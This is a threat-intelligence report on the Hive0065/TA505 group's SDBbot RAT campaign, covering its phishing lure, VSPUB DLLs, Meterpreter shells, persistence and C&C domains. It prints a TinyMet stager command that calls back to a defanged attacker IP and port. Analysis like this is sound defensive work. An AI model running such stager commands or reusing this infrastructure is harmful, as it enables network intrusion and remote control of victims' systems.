IBM X-Force Incident Response and Intelligence Services (IRIS) responds to security incidents around the globe. During analysis and comparison of malicious activity on enterprise networks, our team identified attacks likely linked to Hive0065, also known as TA505. We observed that Hive0065 continues to spread the SDBbot remote-access Trojan (RAT) alongside other custom malware and continues to display tactics used against companies within the past year.
Attacks that deploy malware and RATs on targeted networks are a way for cybercrime groups to compromise networks and open channels for further activity, which could be immediate, or take place at a later stage. RATs are a common tool in targeted attacks as they enable a vast array of remote actions for the attacker. Those include deploying additional malware, spying on users and carrying out actions from the infected device or server where they are installed.
Hive0065 is a financially motivated cybercrime group that has been actively targeting various industries, including finance, retail and restaurants, since at least 2014. This group primarily conducts malicious spam campaigns delivering a wide range of custom and open-source malware. The most notorious among these are campaigns involving banking Trojans such as Dridex and TrickBot, ransomware such as Clop/Cryptomix and MINEBRIDGE, and extortion schemes demanding payment in bitcoin.
SDBbot and Familiar TTPs
In November 2019, X-Force IRIS observed a threat actor targeting enterprise employees in Europe with a spear phishing email impersonating Onehub, a legitimate, cloud-based file-sharing application for businesses. The email was designed to extract Active Directory (AD) discovery data and user credentials and to infect the environment with the SDBbot RAT. Based on our investigation and analysis of the actor’s tactics, techniques and procedures (TTPs), their command-and-control (C&C) infrastructure and the use of specific malware previously attributed to the group, X-Force IRIS suspects it is highly likely that Hive0065 was behind the attacks.
SDBbot RAT has been observed in Hive0065 attacks since at least September 2019 and has been used primarily as a secondary payload. This malware features remote-access capabilities, accepts commands from a C&C server such as video recording, and has the ability to exfiltrate data from the victimized devices and networks.
In a variety of campaigns attributed to this group previously reported by Proofpoint and ZeroFOX, Hive0065 was observed to be conducting phishing campaigns that delivered malicious Excel (.XLS) files hosted on domains spoofed to appear as the cloud storage sites Sync and Dropbox. The campaigns also featured C&C infrastructure that spoofs other legitimate services, like Google Drive and Microsoft Office.
More recent Hive0065 campaigns reported in March 2020 exploited the current interest in the COVID-19 pandemic, using Coronavirus-themed phishing emails to deliver the Locky ransomware and the Dridex banking Trojan. In some campaigns, Hive0065 targeted healthcare organizations with emails purporting to come from medical research groups and offering supposed Coronavirus remedies in exchange for bitcoin payments. The TTPs used in these campaigns align with those of Hive0065/TA505, specifically the spoofing of cloud storage websites to distribute malware files.
Continued Malicious Activity
Research conducted during X-Force IRIS investigations found continued malicious activity from Hive0065 that infected company networks with malware and the SDBbot RAT. The TTPs that we found are consistent with previous activity attributed to Hive0065:
- Spear phishing to deliver malware
- Macro-enabled documents
- The use of droppers containing embedded dynamic-link libraries (DLLs)
- The use of an installer component
- The use of legitimate cloud hosting services for malware distribution
- Spoofing legitimate services like Microsoft and Google
- C&C domains similar in naming convention and structure (sample of domain names shown below)
In order to gain access to victim environments, Hive0065 sends a malicious email to employees purporting to be from an HR representative’s account. The email body impersonated Onehub, inviting the recipient to download a malicious document named Resume.doc.
The employee receiving this email downloaded and opened the document, which contained malicious code. Once the code was executed, a persistence mechanism was installed and a malicious password harvester was executed. In this instance, once the malicious code was executed, it dropped a malicious binary (DLL) similar to CobaltStrike, which subsequently created and executed additional files. The actor used the initially compromised system to escalate privileges and move laterally across additional systems on the network.
Hive0065’s Arsenal of Tools
VSPUB DLLs With CobaltStrike Code Similarities
The malicious email delivering the file named Resume.doc initially led the recipient to a malicious domain. After several redirections, the final redirect pointed to the malicious URL hxxps://dl1.sync-share[.]com?Or2at. In addition, we also observed employees who opened the document browsed to hxxps://dl1.sync-share[.]com and downloaded Resume (1).doc and a second file, Resume (3).doc.
Seconds later, a suspicious document named main_template.docx was created.
Every time main_template.docx was opened, VBA macros were executed and a fake Microsoft Office login window (FakeL.exe) was displayed to the user while a malicious payload executed in the background. If the password entered was correct, the display disappeared. Password attempts were written into a file named Password.txt, which was subsequently deleted.
The document may also display the fake message “This document is protected” to entice users to enable content and execute malicious code. The .docx file contained embedded x86 and x64 versions of the payload DLL so that the appropriate version was dropped depending on the target operating system.
The DLLs were dropped to the following locations:
- x86: %APPDATA%\Microsoft\Windows\Template\vspub1.dll
- x64: %APPDATA%\Microsoft\Windows\Template\vspub2.dll
The DLLs were loaded to the memory space of winword.exe using LoadLibraryW API, and the DLL module was compressed twice to hide actual code. It used a custom packer that unpacks to UPX, an open-source executable packer, which revealed the actual code.
While these DLLs did not match existing, known code families, a code comparison showed that this code has similarities with the CobaltStrike framework. The VSPUB DLLs gather system information and use HTTP POST requests to send it to the C&C domain microsoft-live-us[.]com/fidonet or the IP address 185[.]176[.]221[.]45. Code suggests that upon successful reply from the server, the DLL can download and execute additional files.
To note, microsoft-live-us[.]com was registered just days before the attack took place, along with the domain sync-share[.]com, to include subdomains dl1.sync-share[.]com, dl2.sync-share[.]com and dl3.sync-share[.]com. Sync-share[.]com is likely attacker-owned infrastructure, and although the dl2 and dl3 subdomains were not observed in this particular activity, it is likely that these domains will be used in a similar fashion.
Meterpreter Reverse Shell
After the initial system was compromised, the actors proceeded to compromise additional systems on the network by executing malicious PowerShell services running as the local SYSTEM, as well as the installation of bind shells. A Meterpreter reverser shell was used in order to remotely control compromised systems within the internal network; it was installed as a service using the execution of an encoded PowerShell script. The malicious PowerShell command decodes into a reverse shell connecting back to two malicious IP addresses:
While most samples we found during our investigations were Meterpreter reverse shells connecting back to a C&C IP address, Meterpreter bind-shells that listen for incoming connections were also discovered. We found that a domain admin account was compromised and the Active Directory audit tool PingCastle was run. Using the domain admin, the actor was able to compromise several other accounts and execute malicious services and persistence mechanisms, namely SDBbot RAT Loaders.
TinyMet Meterpreter Stager
The investigation led our team to the discovery of a file named wsus.exe (a version of TinyMet, a tiny, flexible Meterpreter stager), along with three additional files that were created and executed on the first compromised system.
During the investigation, TinyMet was observed being executed with the command c:\intel\wsus.exe 1 91.214.124[.]20 43434, indicating a reverse HTTP connection, and connected to a malicious IP address by either renaming a binary or providing specific arguments. The commands executed were used for discovery purposes, listing members of privileged groups and network information.
SDBbot RAT Installer
X-Force IRIS found that the SDBbot RAT installers are x64-packed and decrypt parts of SDBbot’s code and strings upon execution. In addition, they read a binary blob located within the registry HKLM\\MACHINE\\SOFTWARE\\Microsoft\\[3 characters]\[1 character]. Depending on user privileges, a binary blog is located in the registry value. If regular user privileges are running, the installer component will establish persistence using the registry Run and execute ordinal #1 of the DLL:
SDBbot RAT Loader
As part of the investigation, X-Force IRIS found that the SDBbot RAT loader we analyzed was similar in nature to the version analyzed by Proofpoint, which was defined as the “Loader Component” of SDBbot in Hive0065 campaigns from October 2019. The loader component will read the binary blob and execute the contained shellcode. Once the shellcode executes, it decompresses and executes the SDBbot payload. The shellcode will check to see if it was executed earlier than the loader DLL files and if found to be “TRUE,” the process is terminated.
SDBbot RAT Payload
Once the attackers established a foothold on the network, four new registry keys on the local Software hive were created and SDBbot RAT loader DLL files were installed as persistence mechanisms; the loaders were injected into the process winlogon.exe every time the process was executed.
Upon execution, SDBbot RAT checks for the presence of the mutex windows_7_windows_10_check_running_once_mutex and proceeds to retrieve a C&C address from the file C:\ip.txt. If that file is not available, it will use the C&C drm-server-booking[.]com as the default server. SDBbot RAT will subsequently gather system information and communicate back to the C&C server by sending and receiving a DWORD: 0xC0DE0000. The C&C will send additional arguments depending on the command.
Hive0065 has been active since at least 2014, adjusting its TTPs, targeting and infrastructure with each campaign. A relatively recent addition to Hive0065’s toolkit, SDBbot, is being used in attacks primarily as a second-stage malware, composed of an installer, a loader and RAT components.
SDBbot has the ability to perform typical RAT functions, such as communicating with C&Cs, receiving commands and obtaining system information. On infected systems, this malware could grant attackers extensive ability to drop and execute additional malicious payloads, control infected systems and perform actions the legitimate user would have access to. Remote-access Trojans are one of the most prevalent tools in targeted attacks as they facilitate that type of control for remote attackers.
As X-Force IRIS continues to track Hive0065, we expect to see this group continue to target a wide range of industries using social engineering to deliver open-source and custom malware while constantly adjusting TTPs and C&C infrastructure to evade detection.
Indicators of Compromise (IoCs)
C&C IP Addresses
Final Redirection Hosting Malicious Document